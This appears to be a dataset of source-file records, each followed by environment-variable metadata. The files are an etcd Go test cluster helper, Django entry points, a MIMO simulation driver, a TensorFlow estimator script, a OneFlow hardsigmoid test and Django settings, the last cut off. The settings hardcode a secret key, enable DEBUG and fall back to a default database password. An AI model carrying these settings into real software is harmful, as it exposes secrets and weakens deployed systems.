func mustNewTransport(t testutil.TB, tlsInfo transport.TLSInfo) *http.Transport {
// ticks in the integration test are short, so a 1s dial timeout works well.
tr, err := transport.NewTimeoutTransport(tlsInfo, time.Second, rafthttp.ConnReadTimeout, rafthttp.ConnWriteTimeout)
if err != nil {
t.Fatal(err)
}
return tr
}
type SortableMemberSliceByPeerURLs []client.Member
func (p SortableMemberSliceByPeerURLs) Len() int { return len(p) }
func (p SortableMemberSliceByPeerURLs) Less(i, j int) bool {
return p[i].PeerURLs[0] < p[j].PeerURLs[0]
}
func (p SortableMemberSliceByPeerURLs) Swap(i, j int) { p[i], p[j] = p[j], p[i] }
// NewCluster returns a launched Cluster with a grpc client connection
// for each Cluster member.
func NewCluster(t testutil.TB, cfg *ClusterConfig) *Cluster {
t.Helper()
assertInTestContext(t)
testutil.SkipTestIfShortMode(t, "Cannot start etcd Cluster in --short tests")
c := &Cluster{Cfg: cfg}
ms := make([]*Member, cfg.Size)
for i := 0; i < cfg.Size; i++ {
ms[i] = c.mustNewMember(t)
}
c.Members = ms
if err := c.fillClusterForMembers(); err != nil {
t.Fatal(err)
}
c.Launch(t)
return c
}
func (c *Cluster) TakeClient(idx int) {
c.mu.Lock()
c.Members[idx].Client = nil
c.mu.Unlock()
}
func (c *Cluster) Terminate(t testutil.TB) {
c.mu.Lock()
if c.clusterClient != nil {
if err := c.clusterClient.Close(); err != nil {
t.Error(err)
}
}
c.mu.Unlock()
for _, m := range c.Members {
if m.Client != nil {
m.Client.Close()
}
}
var wg sync.WaitGroup
wg.Add(len(c.Members))
for _, m := range c.Members {
go func(mm *Member) {
defer wg.Done()
mm.Terminate(t)
}(m)
}
wg.Wait()
}
func (c *Cluster) RandClient() *clientv3.Client {
return c.Members[rand.Intn(len(c.Members))].Client
}
func (c *Cluster) Client(i int) *clientv3.Client {
return c.Members[i].Client
}
func (c *Cluster) ClusterClient() (client *clientv3.Client, err error) {
if c.clusterClient == nil {
endpoints := []string{}
for _, m := range c.Members {
endpoints = append(endpoints, m.GrpcURL)
}
cfg := clientv3.Config{
Endpoints: endpoints,
DialTimeout: 5 * time.Second,
DialOptions: []grpc.DialOption{grpc.WithBlock()},
}
c.clusterClient, err = newClientV3(cfg)
if err != nil {
return nil, err
}
}
return c.clusterClient, nil
}
// NewClientV3 creates a new grpc client connection to the member
func (c *Cluster) NewClientV3(memberIndex int) (*clientv3.Client, error) {
return NewClientV3(c.Members[memberIndex])
}
func makeClients(t testutil.TB, clus *Cluster, clients *[]*clientv3.Client, chooseMemberIndex func() int) func() *clientv3.Client {
var mu sync.Mutex
*clients = nil
return func() *clientv3.Client {
cli, err := clus.NewClientV3(chooseMemberIndex())
if err != nil {
t.Fatalf("cannot create client: %v", err)
}
mu.Lock()
*clients = append(*clients, cli)
mu.Unlock()
return cli
}
}
// MakeSingleNodeClients creates a factory of clients that all connect to member 0.
// All the created clients are put on the 'clients' list. The factory is thread-safe.
func MakeSingleNodeClients(t testutil.TB, clus *Cluster, clients *[]*clientv3.Client) func() *clientv3.Client {
return makeClients(t, clus, clients, func() int { return 0 })
}
// MakeMultiNodeClients creates a factory of clients that each connect to a random member.
// All the created clients are put on the 'clients' list. The factory is thread-safe.
func MakeMultiNodeClients(t testutil.TB, clus *Cluster, clients *[]*clientv3.Client) func() *clientv3.Client {
return makeClients(t, clus, clients, func() int { return rand.Intn(len(clus.Members)) })
}
// CloseClients closes all the clients from the 'clients' list.
func CloseClients(t testutil.TB, clients []*clientv3.Client) {
for _, cli := range clients {
if err := cli.Close(); err != nil {
t.Fatal(err)
}
}
}
type GrpcAPI struct {
// Cluster is the Cluster API for the client's connection.
Cluster pb.ClusterClient
// KV is the keyvalue API for the client's connection.
KV pb.KVClient
// Lease is the lease API for the client's connection.
Lease pb.LeaseClient
// Watch is the watch API for the client's connection.
Watch pb.WatchClient
// Maintenance is the maintenance API for the client's connection.
Maintenance pb.MaintenanceClient
// Auth is the authentication API for the client's connection.
Auth pb.AuthClient
// Lock is the lock API for the client's connection.
Lock lockpb.LockClient
// Election is the election API for the client's connection.
Election epb.ElectionClient
}
// GetLearnerMembers returns the list of learner members in Cluster using MemberList API.
func (c *Cluster) GetLearnerMembers() ([]*pb.Member, error) {
cli := c.Client(0)
resp, err := cli.MemberList(context.Background())
if err != nil {
return nil, fmt.Errorf("failed to list member %v", err)
}
var learners []*pb.Member
for _, m := range resp.Members {
if m.IsLearner {
learners = append(learners, m)
}
}
return learners, nil
}
// AddAndLaunchLearnerMember creates a learner member, adds it to Cluster
// via v3 MemberAdd API, and then launches the new member.
func (c *Cluster) AddAndLaunchLearnerMember(t testutil.TB) {
m := c.mustNewMember(t)
m.IsLearner = true
scheme := SchemeFromTLSInfo(c.Cfg.PeerTLS)
peerURLs := []string{scheme + "://" + m.PeerListeners[0].Addr().String()}
cli := c.Client(0)
_, err := cli.MemberAddAsLearner(context.Background(), peerURLs)
if err != nil {
t.Fatalf("failed to add learner member %v", err)
}
m.InitialPeerURLsMap = types.URLsMap{}
for _, mm := range c.Members {
m.InitialPeerURLsMap[mm.Name] = mm.PeerURLs
}
m.InitialPeerURLsMap[m.Name] = m.PeerURLs
m.NewCluster = false
if err := m.Launch(); err != nil {
t.Fatal(err)
}
c.Members = append(c.Members, m)
c.waitMembersMatch(t)
}
// getMembers returns a list of members in the Cluster, in the format of etcdserverpb.Member
func (c *Cluster) getMembers() []*pb.Member {
var mems []*pb.Member
for _, m := range c.Members {
mem := &pb.Member{
Name: m.Name,
PeerURLs: m.PeerURLs.StringSlice(),
ClientURLs: m.ClientURLs.StringSlice(),
IsLearner: m.IsLearner,
}
mems = append(mems, mem)
}
return mems
}
// waitMembersMatch waits until v3rpc MemberList returns the 'same' members info as the
// local 'c.Members', which is the local record of members in the testing Cluster,
// except that the local record c.Members does not have info on Member.ID, which
// is generated when the member is added to the Cluster.
//
// Note:
// A successful match means the Member.clientURLs are matched. This means member has already
// finished publishing its server attributes to Cluster. Publishing attributes is a Cluster-wide
// write request (in v2 server). Therefore, at this point, any raft log entries prior to this
// would have already been applied.
//
// If a new member was added to an existing Cluster, at this point, it has finished publishing
// its own server attributes to the Cluster. And therefore by the same argument, it has already
// applied the raft log entries (especially those of type raftpb.ConfChangeType). At this point,
// the new member has the correct view of the Cluster configuration.
//
// Special note on learner member:
// Learner member is only added to a Cluster via v3rpc MemberAdd API (as of v3.4). When starting
// the learner member, its initial view of the Cluster created by peerURLs map does not have info
// on whether or not the new member itself is learner. But at this point, a successful match does
// indicate that the new learner member has applied the raftpb.ConfChangeAddLearnerNode entry
// which was used to add the learner itself to the Cluster, and therefore it has the correct info
// on learner.
func (c *Cluster) waitMembersMatch(t testutil.TB) {
wMembers := c.getMembers()
sort.Sort(SortableProtoMemberSliceByPeerURLs(wMembers))
cli := c.Client(0)
for {
resp, err := cli.MemberList(context.Background())
if err != nil {
t.Fatalf("failed to list member %v", err)
}
if len(resp.Members) != len(wMembers) {
continue
}
sort.Sort(SortableProtoMemberSliceByPeerURLs(resp.Members))
for _, m := range resp.Members {
m.ID = 0
}
if reflect.DeepEqual(resp.Members, wMembers) {
return
}
time.Sleep(TickDuration)
}
}
type SortableProtoMemberSliceByPeerURLs []*pb.Member
func (p SortableProtoMemberSliceByPeerURLs) Len() int { return len(p) }
func (p SortableProtoMemberSliceByPeerURLs) Less(i, j int) bool {
return p[i].PeerURLs[0] < p[j].PeerURLs[0]
}
func (p SortableProtoMemberSliceByPeerURLs) Swap(i, j int) { p[i], p[j] = p[j], p[i] }
// MustNewMember creates a new member instance based on the response of V3 Member Add API.
func (c *Cluster) MustNewMember(t testutil.TB, resp *clientv3.MemberAddResponse) *Member {
m := c.mustNewMember(t)
m.IsLearner = resp.Member.IsLearner
m.NewCluster = false
m.InitialPeerURLsMap = types.URLsMap{}
for _, mm := range c.Members {
m.InitialPeerURLsMap[mm.Name] = mm.PeerURLs
}
m.InitialPeerURLsMap[m.Name] = types.MustNewURLs(resp.Member.PeerURLs)
c.Members = append(c.Members, m)
return m
}
| [
"\"CLUSTER_DEBUG\""
] | [] | [
"CLUSTER_DEBUG"
] | [] | ["CLUSTER_DEBUG"] | go | 1 | 0 | |
manage.py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'postproject.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
imtoolkit/imtoolkit.py | # Copyright (c) IMToolkit Development Team
# This toolkit is released under the MIT License, see LICENSE.txt
import re
import sys
import time
from imtoolkit import *
def main():
np.set_printoptions(threshold=np.inf)
title = " IMToolkit Version " + IMTOOLKIT_VERSION + " "
print("=" * len(title) + "\n" + title + "\n" + "=" * len(title))
if os.getenv("USECUPY") == "1":
print("CuPy-aided GPGPU acceleration is activated in your environment.")
print("One can activate the NumPy counterpart by executing")
print("> unset USECUPY")
else:
print("NumPy is used for all the calculations.")
print("The use of CUDA and CuPy is strongly recommended.")
print("One can activate it by executing")
print("> export USECUPY=1")
print("")
if len(sys.argv) <= 1 or (len(sys.argv) == 2 and "-h" in sys.argv[1]):
print("IMToolkit official website: https://ishikawa.cc/imtoolkit/")
print("A detailed tutorial: https://ishikawa.cc/imtoolkit/tutorial.html")
print("Fork me on GitHub: https://github.com/imtoolkit/imtoolkit")
quit()
args = sys.argv[1:]
for arg in args:
lentitle = len(arg) + 6
print("-" * lentitle + "\narg = " + arg + "\n" + "-" * lentitle)
params = Parameters(arg)
# initialize a codebook, which also supports BLAST/OFDM by setting M = K
meanPower = 1 # For the MIMO scenario, the mean power is normalized to 1
if params.channel == "ofdm":
# For the OFDM scenario, the mean power of symbol vectors is normalized to M
meanPower = params.M
if params.code == "symbol":
code = SymbolCode(params.mod, params.L)
elif params.code == "index":
code = IMCode(params.dm, params.M, params.K, params.Q, params.mod, params.L, meanPower)
elif params.code == "OSTBC":
if params.isSpeficied("O"):
code = OSTBCode(params.M, params.mod, params.L, params.O)
else:
code = OSTBCode(params.M, params.mod, params.L)
elif params.code == "DUC":
code = DiagonalUnitaryCode(params.M, params.L)
elif params.code == "ADSM":
if params.isSpeficied("u1"):
code = ADSMCode(params.M, params.mod, params.L, params.u1)
else:
code = ADSMCode(params.M, params.mod, params.L)
elif params.code == "TAST":
code = TASTCode(params.M, params.Q, params.L, params.mod)
# initialize a channel generator
if params.channel == "rayleigh": # quasi-static Rayleigh fading
if re.match(r'.*P$', params.mode):
# Parallel channel
channel = IdealRayleighChannel(params.ITi, params.M, params.N)
else:
# Single channel
channel = IdealRayleighChannel(1, params.M, params.N)
elif params.channel == "ofdm": # ideal frequency-selective OFDM channel
params.N = params.M
if re.match(r'.*P$', params.mode):
# Parallel channel
channel = IdealOFDMChannel(params.ITi, params.M)
else:
# Single channel
channel = IdealOFDMChannel(1, params.M)
elif params.channel == "rice": # ideal Rician fading
# channel parameters, that need to be modified based on your setup
print("bohagen2007los")
frequency = 5.0 * 10**9 # 5 [GHz]
wavelength = frequencyToWavelength(frequency)
height = params.R if params.isSpeficied("R") else 3.0
dTx = params.dTx if params.isSpeficied("dTx") else height / max(params.M, params.N)
print("dTx = %1.2f"%dTx)
rx, ry, rz = IdealRicianChannel.getPositionsUniformLinearArray(params.N, wavelength, 0)
tx, ty, tz = IdealRicianChannel.getPositionsUniformLinearArray(params.M, dTx, height)
#tx, ty, tz = IdealRicianChannel.getPositionsRectangular2d(params.M, wavelength, 3.0)
#rx, ry, rz = IdealRicianChannel.getPositionsRectangular2d(params.N, wavelength, 0.0)
if re.match(r'.*P$', params.mode):
# Parallel channel
channel = IdealRicianChannel(params.ITi, params.Kf, wavelength, tx, ty, tz, rx, ry, rz)
else:
# Single channel
channel = IdealRicianChannel(1, params.Kf, wavelength, tx, ty, tz, rx, ry, rz)
# initialize a simulator
if params.sim == "coh":
sim = CoherentMLDSimulator(code.codes, channel)
elif params.sim == "diff":
sim = DifferentialMLDSimulator(code.codes, channel)
elif params.sim == "sudiff":
sim = SemiUnitaryDifferentialMLDSimulator(code.codes, channel)
elif params.sim == "nsdiff":
E1 = Basis.getGSPE1(params) if params.basis[0] == "g" else None
bases = Basis(params.basis, params.M, params.T, E1=E1).bases
sim = NonSquareDifferentialMLDSimulator(code.codes, channel, bases)
elif params.sim == "nsdiffc" or params.sim == "nsdiffce":
E1 = Basis.getGSPE1(params) if params.basis[0] == "g" else None
txbases = ChaosBasis(params.basis, params.M, params.T, params.W, params.x0, params.Ns, E1 = E1).bases
if params.isSpeficied("d"):
rxbases = ChaosBasis(params.basis, params.M, params.T, params.W, params.x0 + params.d, params.Ns, E1 = E1).bases
else:
rxbases = txbases
sim = NonSquareDifferentialChaosMLDSimulator(code.codes, channel, txbases, rxbases)
start_time = time.time()
if params.mode == "RATE":
code.putRate()
elif params.mode == "MED":
if params.sim == "nsdiff":
print("MED = " + str(getMinimumEuclideanDistance(np.matmul(code.codes, bases[0]))))
else:
print("MED = " + str(getMinimumEuclideanDistance(code.codes)))
elif params.mode == "BER":
sim.simulateBERReference(params)
elif params.mode == "BERP":
sim.simulateBERParallel(params)
elif params.mode == "AMI":
sim.simulateAMIReference(params)
elif params.mode == "AMIP":
sim.simulateAMIParallel(params)
elif params.mode == "VIEW":
if params.sim == "nsdiff":
print(np.matmul(code.codes, bases[0]))
else:
print(code.codes)
elif params.mode == "VIEWIM":
print(np.array(convertIndsToVector(code.inds, params.M)).reshape(-1, params.Q))
print("Minimum Hamming distance = %d" % getMinimumHammingDistance(code.inds, params.M))
print("Inequality L1 = %d" % getInequalityL1(code.inds, params.M))
elif params.mode == "VIEWIMTEX":
print("$\\a$(%d, %d, %d) $=$ [" % (params.M, params.K, params.Q))
es = [", ".join(["%d" % (i+1) for i in iarr]) for iarr in code.inds]
print(", ".join(["[" + e + "]" for e in es]) + "].")
elif params.mode == "CONST":
if params.sim == "nsdiffc":
Nc = code.codes.shape[0]
symbols = np.array([np.matmul(code.codes[i], txbases[:, :, 0]) for i in range(Nc)]).reshape(-1)
elif params.sim == "nsdiff":
symbols = np.matmul(code.codes, bases[0]).reshape(-1)
else:
symbols = code.codes.reshape(-1)
df = {"real": np.real(symbols), "imag": np.imag(symbols)}
Simulator.saveCSV(arg, df)
elif params.mode == "SEARCH":
if params.code == "TAST":
TASTCode.search(params.M, params.Q, params.L)
elapsed_time = time.time() - start_time
print ("Elapsed time = %.10f seconds" % (elapsed_time))
if __name__ == '__main__':
main()
| [] | [] | [
"USECUPY"
] | [] | ["USECUPY"] | python | 1 | 0 | |
python/django/app/wsgi.py | """
WSGI config for bl project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
wsgi.py | """
WSGI config for Finetooth project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
from django.core.wsgi import get_wsgi_application
if os.path.exists(".development"):
application = get_wsgi_application()
else:
from dj_static import Cling
application = Cling(get_wsgi_application())
| [] | [] | [] | [] | [] | python | 0 | 0 | |
mydeepctr/examples/lr/controller.py | '''
@Author: your name
@Date: 2020-05-27 14:53:55
@LastEditTime: 2020-06-09 13:07:02
@LastEditors: Please set LastEditors
@Description: In User Settings Edit
@FilePath: /model-building/recommend/estimator/lr.py
'''
import tensorflow as tf
import os
import sys
import json
import argparse
tf.logging.set_verbosity(tf.logging.INFO)
# ================================= tfrecords are written in advance =================================
parser = argparse.ArgumentParser()
parser.add_argument("--tfrecord_dir", type=str, default="../data/")
parser.add_argument("--project_dir", type=str, default=None)
parser.add_argument("--output_dir", type=str, default=None)
parser.add_argument("--mode", type=str, default='train')
parser.add_argument("--dense_cols", type=str, default=None)
parser.add_argument("--sparse_cols", type=str, default=None)
parser.add_argument("--seq_cols", type=str, default=None)
parser.add_argument("--target", type=str, default=None)
parser.add_argument("--vocab_list", type=str, default=None)
parser.add_argument("--exclude", type=str, default="")
parser.add_argument("--batch_size", type=int, default=10)
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epoches", type=int, default=10)
parser.add_argument("--num_examples", type=int, default=100)
parser.add_argument('--use_bn', action='store_true', default=False)
parser.add_argument('--use_deep', action='store_true', default=False)
parser.add_argument("--log_step_count_steps", type=int, default=1000)
parser.add_argument("--save_checkpoints_steps", type=int, default=1000)
parser.add_argument("--summary_save_dir", type=str, default='./log/summary/')
parser.add_argument("--summary_every_n_step", type=int, default=1000)
parser.add_argument("--ckpt_save_dir", type=str, default='./log/summary/')
args = parser.parse_args()
sys.path.append(args.project_dir)
from models.lr import LRConfig
from inputs import DenseFeature, SparseFeature
from model import model_fn_builder
from data import tfrecord2fn, csv2tfrecord
# ================================= Environment configuration =================================
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
num_train_steps = args.num_examples / args.batch_size * args.num_epoches
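# Sanity check of the step arithmetic with the argparse defaults above:
# num_examples=100, batch_size=10, num_epoches=10 -> 100 / 10 * 10 = 100 train steps.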
# ================================= Model definition =================================
if args.dense_cols is None:
dense_features = []
else:
dense_features = [f.strip() for f in args.dense_cols.split(',')]
if args.sparse_cols is None:
sparse_features = []
vocab_list = []
vocab_dict = {}
else:
sparse_features = [f.strip() for f in args.sparse_cols.split(',')]
vocab_list = [int(v.strip()) for v in args.vocab_list.split(',')]
vocab_dict = {feat:vocab_list[idx] for idx, feat in enumerate(sparse_features)}
sparse_feature_columns = [SparseFeature(feature_name=feat, vocab_size=vocab_dict[feat], embedding_dim=3) for feat in sparse_features]
dense_feature_columns = [DenseFeature(feature_name=feat) for feat in dense_features]
dnn_feature_columns = dense_feature_columns + sparse_feature_columns
linear_feature_columns = dense_feature_columns + sparse_feature_columns
model_config = LRConfig(dnn_feature_columns, linear_feature_columns, class_num=2)
model_fn = model_fn_builder(
model_config=model_config,
learning_rate=args.learning_rate,
init_checkpoint=None,
summary_save_dir=args.summary_save_dir,
summary_every_n_step=args.summary_every_n_step,
task='binary_classification'
)
# ================================= Estimator configuration =================================
session_config = tf.ConfigProto(allow_soft_placement=True)
run_config = tf.estimator.RunConfig(
log_step_count_steps=args.log_step_count_steps,
save_checkpoints_steps=args.save_checkpoints_steps,
session_config=session_config,
model_dir=args.ckpt_save_dir
)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=args.ckpt_save_dir,
params={},
config=run_config
)
# ================================= Estimator execution =================================
# ======================== Build the input ========================
# Define the tfrecord feature schema
name2features = {}
for f in sparse_features:
name2features[f] = tf.io.FixedLenFeature([], tf.int64)
for f in dense_features:
name2features[f] = tf.io.FixedLenFeature([], tf.float32)
for f in [args.target]:
name2features[f] = tf.io.FixedLenFeature([], tf.float32)
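# name2features now maps every column to a scalar feature spec; e.g. with
# hypothetical columns sparse=["gender"], dense=["age"], target="label":
# {"gender": FixedLenFeature([], tf.int64),
#  "age": FixedLenFeature([], tf.float32),
#  "label": FixedLenFeature([], tf.float32)}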
if args.mode == 'train':
train_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'train.tfrecord'), name2features, args.batch_size, args.num_epoches,drop_remainder=True, mode=tf.estimator.ModeKeys.TRAIN, target=args.target)
elif args.mode == 'eval':
eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.EVAL, target=args.target)
elif args.mode == 'test':
eval_input_fn = tfrecord2fn(os.path.join(args.tfrecord_dir, 'eval.tfrecord'), name2features, args.batch_size, args.num_epoches, drop_remainder=True, mode=tf.estimator.ModeKeys.PREDICT, target=args.target)
# ======================== Run training / evaluation ========================
try:
early_stopping_hook = tf.estimator.experimental.stop_if_no_decrease_hook(
estimator=estimator,
metric_name='eval_loss',
max_steps_without_decrease=1000,
run_every_secs=None,
run_every_steps=1000
)
except:
early_stopping_hook = tf.contrib.estimator.stop_if_no_decrease_hook(
estimator=estimator,
metric_name='eval_loss',
max_steps_without_decrease=1000,
run_every_secs=None,
run_every_steps=1000
)
if args.mode == 'train':
# pass the early-stopping hook so training stops once eval_loss stops improving
estimator.train(train_input_fn, max_steps=num_train_steps, hooks=[early_stopping_hook])
elif args.mode == 'eval':
res = estimator.evaluate(eval_input_fn)
print(res)
res = {k: float(res[k]) for k in res}
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
with open(os.path.join(args.output_dir, 'result.json'), 'w') as f:
json.dump(res, f)
| [] | [] | [
"CUDA_VISIBLE_DEVICES"
] | [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
python/oneflow/compatible/single_client/test/ops/test_hardsigmoid.py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import random
import unittest
from collections import OrderedDict
from typing import Dict
import numpy as np
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
def _compare_hardsigmoid_with_np(
input_shape, device_type, value_type, machine_ids, device_counts
):
if value_type[1] == flow.float16:
input_1 = np.random.uniform(-3.5, 3.5, size=input_shape).astype(np.float16)
input_1 += np.random.randn(*input_shape).astype(np.float16)
input_1 = np.array(input_1, dtype=value_type[0])
else:
input_1 = np.random.uniform(-3.5, 3.5, size=input_shape).astype(value_type[0])
input_1 += np.random.randn(*input_shape).astype(value_type[0])
assert device_type in ["cpu", "gpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config = flow.FunctionConfig()
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
if value_type[1] == flow.float16:
func_config.default_data_type(flow.float32)
else:
func_config.default_data_type(value_type[1])
def np_hardsigmoid(input):
input_shape = input.shape
input = input.flatten()
elem_cnt = input.size
_zero = np.zeros_like(input)
for i in range(elem_cnt):
if input[i] >= 3:
_zero[i] = 1
elif input[i] <= -3:
_zero[i] = 0
else:
_zero[i] = input[i] / 6 + 0.5
np_hsigmoid_out = np.reshape(_zero, newshape=input_shape)
return np.array(np_hsigmoid_out).astype(value_type[0])
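# The element-wise loop above is a readable reference; an equivalent
# vectorized form (sketch, not used by the test) would be:
# np.clip(input / 6 + 0.5, 0, 1).astype(value_type[0])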
np_out_hardsigmoid = np_hardsigmoid(input_1)
def np_diff(input):
input_shape = input.shape
input = input.flatten()
elem_cnt = input.size
diff = np.zeros(shape=(elem_cnt,), dtype=value_type[0])
for i in range(elem_cnt):
if input[i] > -3 and input[i] < 3:
diff[i] = 1 / 6
diff = np.reshape(diff, newshape=input_shape)
return diff
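# np_diff encodes d/dx hardsigmoid(x): 1/6 on the open interval (-3, 3) and
# 0 elsewhere (the kinks at exactly +/-3 are assigned zero here).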
_np_grad = np_diff(input_1)
def assert_prediction_grad(blob: tp.Numpy):
if value_type[1] == flow.float16:
assert np.allclose(blob, _np_grad, atol=0.001)
else:
assert np.allclose(blob, _np_grad, atol=1e-05)
if value_type[1] == flow.float16:
@flow.global_function(type="train", function_config=func_config)
def oneflow_hardsigmoid(
of_input_1: tp.Numpy.Placeholder(shape=input_1.shape, dtype=flow.float32)
) -> tp.Numpy:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=input_1.shape,
dtype=flow.float32,
initializer=flow.zeros_initializer(),
name="x_var",
)
x_var = of_input_1 + v
x_f16 = flow.cast(x_var, flow.float16)
of_hardsigmoid_out_f16 = flow.nn.hardsigmoid(x_f16)
of_hardsigmoid_out_f32 = flow.cast(of_hardsigmoid_out_f16, flow.float32)
with flow.scope.placement(device_type, "0:0"):
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0
).minimize(of_hardsigmoid_out_f32)
flow.watch_diff(x_var, assert_prediction_grad)
return of_hardsigmoid_out_f32
else:
@flow.global_function(type="train", function_config=func_config)
def oneflow_hardsigmoid(
of_input_1: tp.Numpy.Placeholder(shape=input_1.shape, dtype=value_type[1])
) -> tp.Numpy:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=input_1.shape,
dtype=value_type[1],
initializer=flow.zeros_initializer(),
name="x_var",
)
x_var = of_input_1 + v
flow.watch_diff(x_var, assert_prediction_grad)
of_hardsigmoid_out = flow.nn.hardsigmoid(x_var)
with flow.scope.placement(device_type, "0:0"):
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.001]), momentum=0
).minimize(of_hardsigmoid_out)
return of_hardsigmoid_out
of_out_hardsigmoid = oneflow_hardsigmoid(input_1)
if value_type[1] == flow.float16:
assert np.allclose(of_out_hardsigmoid, np_out_hardsigmoid, atol=0.01)
else:
assert np.allclose(of_out_hardsigmoid, np_out_hardsigmoid, atol=1e-05)
def _gen_arg_dict(shape, device_type, value_type, machine_ids, device_counts):
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["device_type"] = [device_type]
if value_type == "float" and device_type == "cpu":
arg_dict["value_type"] = [
(np.float32, flow.float32),
(np.float64, flow.float64),
]
else:
arg_dict["value_type"] = [
(np.float32, flow.float16),
(np.float32, flow.float32),
(np.float64, flow.float64),
]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testhardsigmoid1n1d(flow.unittest.TestCase):
def test_hardsigmoid_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16),
device_type="cpu",
value_type="float",
machine_ids="0:0",
device_counts=1,
)
for arg in GenArgList(arg_dict):
_compare_hardsigmoid_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_hardsigmoid_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(16, 16),
device_type="gpu",
value_type="float",
machine_ids="0:0",
device_counts=1,
)
for arg in GenArgList(arg_dict):
_compare_hardsigmoid_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testhardsigmoid1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_hardsigmoid_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(4, 8, 16),
device_type="gpu",
value_type="float",
machine_ids="0:0-1",
device_counts=2,
)
for arg in GenArgList(arg_dict):
_compare_hardsigmoid_with_np(*arg)
if __name__ == "__main__":
unittest.main()
| [] | [] | [
"ONEFLOW_TEST_CPU_ONLY"
] | [] | ["ONEFLOW_TEST_CPU_ONLY"] | python | 1 | 0 | |
app/app/settings.py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "2*)z@*h^wn!k-3)fu(4q_^87t3e#hd#g&42_5ra4g8s(7d&+e5"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"rest_framework",
"rest_framework.authtoken",
"core",
"user",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "app.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "app.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql",
"HOST": os.environ.get("DB_HOST", "localhost"),
"NAME": os.environ.get("DB_NAME", "app"),
"USER": os.environ.get("DB_USER", "postgres"),
"PASSWORD": os.environ.get("DB_PASS", "foobar"),
"PORT": os.environ.get("DB_PORT", "5433"),
}
}
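# The settings above fall back to local defaults; in a containerized setup
# they would typically be overridden via the environment, e.g. (hypothetical
# values):
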